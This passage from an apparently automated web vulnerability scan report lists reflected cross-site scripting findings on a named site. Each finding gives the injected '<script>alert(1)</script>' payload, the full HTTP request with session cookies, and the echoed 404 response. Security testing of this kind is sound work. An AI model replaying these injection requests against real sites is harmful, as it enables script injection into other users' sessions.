Path:	/detail/11/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ef8e<script>alert(1)</script>d6ba1dc2204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/114ef8e<script>alert(1)</script>d6ba1dc2204/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/114ef8e<script>alert(1)</script>d6ba1dc2204/rating.php was not found on this server.</p>
...[SNIP]...

2.919. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e4fa6<script>alert(1)</script>b843420c14d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/rating.phpe4fa6<script>alert(1)</script>b843420c14d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.phpe4fa6<script>alert(1)</script>b843420c14d was not found on this server.</p>
...[SNIP]...

2.920. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f9d2<script>alert(1)</script>0b55685ae79e330c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/11/rating.php8f9d2<script>alert(1)</script>0b55685ae79e330c5?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.php8f9d2<script>alert(1)</script>0b55685ae79e330c5?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.921. http://www.resellerbase.com/detail/11/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dda7e<script>alert(1)</script>c58f7c33f08e89c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/11/rating.php/dda7e<script>alert(1)</script>c58f7c33f08e89c01?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.php/dda7e<script>alert(1)</script>c58f7c33f08e89c01?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.922. http://www.resellerbase.com/detail/11/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7873f<script>alert(1)</script>05dddf727c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/rating.php?7873f<script>alert(1)</script>05dddf727c9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.php?7873f<script>alert(1)</script>05dddf727c9=1 was not found on this server.</p>
...[SNIP]...

2.923. http://www.resellerbase.com/detail/11/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ba6c<script>alert(1)</script>3f679e40754 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7ba6c<script>alert(1)</script>3f679e40754/11/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7ba6c<script>alert(1)</script>3f679e40754/11/search.php was not found on this server.</p>
...[SNIP]...

2.924. http://www.resellerbase.com/detail/11/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60c35<script>alert(1)</script>c7f818d9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1160c35<script>alert(1)</script>c7f818d9f94/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1160c35<script>alert(1)</script>c7f818d9f94/search.php was not found on this server.</p>
...[SNIP]...

2.925. http://www.resellerbase.com/detail/11/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6aa3e<script>alert(1)</script>3ed92c53583 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/search.php6aa3e<script>alert(1)</script>3ed92c53583 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php6aa3e<script>alert(1)</script>3ed92c53583 was not found on this server.</p>
...[SNIP]...

2.926. http://www.resellerbase.com/detail/11/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7eca0<a>0e5d84e62e2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/search.php?keyword=search...&Submit3=Search7eca0<a>0e5d84e62e2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?keyword=search...&Submit3=Search7eca0<a>0e5d84e62e2&opt=2 was not found on this server.</p>
...[SNIP]...

2.927. http://www.resellerbase.com/detail/11/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1b8f5<a>93edda25898 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/search.php?keyword=search...1b8f5<a>93edda25898&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?keyword=search...1b8f5<a>93edda25898&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.928. http://www.resellerbase.com/detail/11/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 356bc<script>alert(1)</script>6884990c738 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/search.php?356bc<script>alert(1)</script>6884990c738=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?356bc<script>alert(1)</script>6884990c738=1 was not found on this server.</p>
...[SNIP]...

2.929. http://www.resellerbase.com/detail/11/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7bcb8<a>78b22f91fc3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/search.php?keyword=search...&Submit3=Search&opt=27bcb8<a>78b22f91fc3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?keyword=search...&Submit3=Search&opt=27bcb8<a>78b22f91fc3 was not found on this server.</p>
...[SNIP]...

2.930. http://www.resellerbase.com/detail/11/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38dda<script>alert(1)</script>87c603092e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail38dda<script>alert(1)</script>87c603092e1/11/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail38dda<script>alert(1)</script>87c603092e1/11/themes/ was not found on this server.</p>
...[SNIP]...

2.931. http://www.resellerbase.com/detail/11/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5697<script>alert(1)</script>ce2f6e538ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11b5697<script>alert(1)</script>ce2f6e538ad/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11b5697<script>alert(1)</script>ce2f6e538ad/themes/ was not found on this server.</p>
...[SNIP]...

2.932. http://www.resellerbase.com/detail/11/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87563<script>alert(1)</script>06940c532c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes87563<script>alert(1)</script>06940c532c5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes87563<script>alert(1)</script>06940c532c5/ was not found on this server.</p>
...[SNIP]...

2.933. http://www.resellerbase.com/detail/11/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 10812<script>alert(1)</script>eff8211653f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/?10812<script>alert(1)</script>eff8211653f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/?10812<script>alert(1)</script>eff8211653f=1 was not found on this server.</p>
...[SNIP]...

2.934. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2313<script>alert(1)</script>4a6aa4bacd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila2313<script>alert(1)</script>4a6aa4bacd6/11/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila2313<script>alert(1)</script>4a6aa4bacd6/11/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.935. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c07ff<script>alert(1)</script>25fb198efe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11c07ff<script>alert(1)</script>25fb198efe8/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.936. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba484<script>alert(1)</script>c28c064e682 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themesba484<script>alert(1)</script>c28c064e682/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themesba484<script>alert(1)</script>c28c064e682/kosmos/ was not found on this server.</p>
...[SNIP]...

2.937. http://www.resellerbase.com/detail/11/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6479c<script>alert(1)</script>3e196cc94bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos6479c<script>alert(1)</script>3e196cc94bf/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos6479c<script>alert(1)</script>3e196cc94bf/ was not found on this server.</p>
...[SNIP]...

2.938. http://www.resellerbase.com/detail/11/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c0b1<script>alert(1)</script>d8adee29210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

